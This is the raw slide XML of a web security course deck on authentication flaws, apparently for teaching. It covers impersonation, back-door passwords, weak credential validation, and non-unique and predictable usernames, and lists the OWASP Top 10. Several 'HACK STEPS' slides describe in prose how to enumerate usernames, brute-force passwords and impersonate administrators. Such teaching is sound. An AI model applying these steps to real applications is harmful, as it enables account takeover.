            <a:r>
              <a:t>This function has some design flaws though</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6" name="User Impersonation Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="868680">
              <a:defRPr sz="5130"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Impersonation Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="It may be implemented as a “hidden” function, which is not subject to proper access controls. For example, anyone who knows or guesses the URL /admin/ImpersonateUser.jsp may be able to make use of the function and impersonate any other user.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>It may be implemented as a “hidden” function, which is not subject to proper access controls. For example, anyone who knows or guesses the URL /admin/ImpersonateUser.jsp may be able to make use of the function and impersonate any other user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>The application may trust user-controllable data when determining whether the user is performing impersonation. For example, in addition to a valid session token, a user may also submit a cookie specifying which account their session is currently using. An attacker may be able to modify this value and gain access to other user accounts without authentication.</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9" name="User Impersonation Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="868680">
              <a:defRPr sz="5130"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Impersonation Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1490" name="image10.png" descr="image10.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2297355" y="3034453"/>
            <a:ext cx="8371841" cy="5648961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>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2" name="User Impersonation Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="868680">
              <a:defRPr sz="5130"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Impersonation Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1493" name="If an application allows administrative users to be impersonated, then any weakness in the impersonation logic may result in a vertical privilege escalation vulnerability  an attacker may gain full control of the application."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If an application allows administrative users to be impersonated, then any weakness in the impersonation logic may result in a vertical privilege escalation vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>an attacker may gain full control of the application.</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5" name="User Impersonation Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="868680">
              <a:defRPr sz="5130"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Impersonation Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1496" name="Back-door password is also vulnerable to discovery by an attacker if matched with the user’s actual password"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Back-door password is also vulnerable to discovery by an attacker if matched with the user’s actual password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1497" name="image11.png" descr="image11.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251200" y="4768426"/>
            <a:ext cx="6881708" cy="3684695"/>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9" name="User Impersonation Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="868680">
              <a:defRPr sz="5130"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Impersonation Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1500" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Identify any impersonation functionality within the application. If this is not explicitly linked from published content, it may still be implemented.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Attempt to use the impersonation functionality directly to impersonate other users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>Attempt to manipulate any user-supplied data that is processed by the impersonation function in an attempt to impersonate other users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>If you succeed in making use of the functionality, attempt to impersonate any known or guessed administrative users, in order to elevate privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="2000"/>
            </a:pPr>
            <a:r>
              <a:t>When carrying out password guessing attacks, review whether any users appear to have more than one valid password, or whether a specific password has been matched against several usernames. Also, log in as many different users with the credentials captured in a brute-force attack, and review whether everything appears normal. Pay close attention to any “logged in as X” status message.</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2" name="Incomplete Validation of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Incomplete Validation of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1503" name="Some poorly designed authentication mechanisms not only do not enforce the good practices of a minimum length or the presence of both uppercase and lowercase characters in passwords, but also do not take account of users’ own attempts to comply with them."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Some poorly designed authentication mechanisms not only do not enforce the good practices of a minimum length or the presence of both uppercase and lowercase characters in passwords, but also do not take account of users’ own attempts to comply with them.</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5" name="Incomplete Validation of Credentials"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="804672">
              <a:defRPr sz="4752"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Incomplete Validation of Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1506" name="HACK STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Using an account you control, attempt to log in with variations on your own password: removing the last character, changing the case of a character, and removing any special typographical characters. If any of these attempts is successful, continue experimenting to try and understand what validation is actually occurring.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Feed any results back into your automated password guessing attacks, to remove superfluous test cases and improve the chances of success.</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8" name="Non-Unique Usernames"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Non-Unique Usernames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1509" name="Flaws:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Flaws:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>One user who shares a username with another user may also happen to select the same password as that user, either during registration or in a subsequent password change.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>An attacker may exploit this behavior to carry out a successful brute-force attack, even though this may not be possible elsewhere due to restrictions on failed login attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="731520" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>An attacker can register a specific username multiple times with different passwords, while monitoring for the differential response that indicates that an account with that username and password already existed.</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1" name="Non-Unique Usernames"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Non-Unique Usernames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1512" name="HACK  STEPS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK  STEPS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If self-registration is possible, attempt to register the same username twice with different passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If the application blocks the second registration attempt, you can exploit this behavior to enumerate existing usernames even if this is not possible on the main login page or elsewhere. Make multiple registration attempts with a list of common usernames to identify the already registered names that the application blocks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If the registration of duplicate usernames succeeds, attempt to register the same username twice with the same password, and determine the application’s behavior:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If an error message results, you can exploit this behavior to carry out a brute-force attack, even if this is not possible on the main login page. Target an enumerated or guessed username, and attempt to register this username multiple times with a list of common passwords. When the application rejects one specific password, you have probably found the existing password for the targeted account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379827" indent="-379827">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>If no error message results, log in using the credentials you specified and see what happens. You may need to register several users, and modify different data held within each account, to understand whether this behavior can be used to gain unauthorized access to other users’ accounts.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4" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Repudation"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772215" y="1414953"/>
            <a:ext cx="247756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Repudation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5378361" y="5994187"/>
            <a:ext cx="418482" cy="442202"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="12700" dir="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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4" name="Predictable Usernames"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Predictable Usernames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1515" name="Attackers can quickly discern names and passwords if an application has usernames in a particular sequence such as cust5331, cust5332, etc.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Attackers can quickly discern names and passwords if an application has usernames in a particular sequence such as cust5331, cust5332, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>HACK STEPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>If usernames are generated by the application, try to obtain several usernames in quick succession and determine whether any sequence or pattern can be discerned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>If so, extrapolate backwards to obtain a list of possible valid usernames. This can be used as the basis for a brute-force attack against the login and other attacks where valid usernames are required, such as the exploitation of access control flaws. </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7" name="Predictable Initial Passwords"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Predictable Initial Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1518" name="In some applications, users are created all at once or in sizeable batches and are automatically assigned initial passwords, which are then distributed to them through some means.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>In some applications, users are created all at once or in sizeable batches and are automatically assigned initial passwords, which are then distributed to them through some means. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="749808" indent="-384047">
              <a:lnSpc>
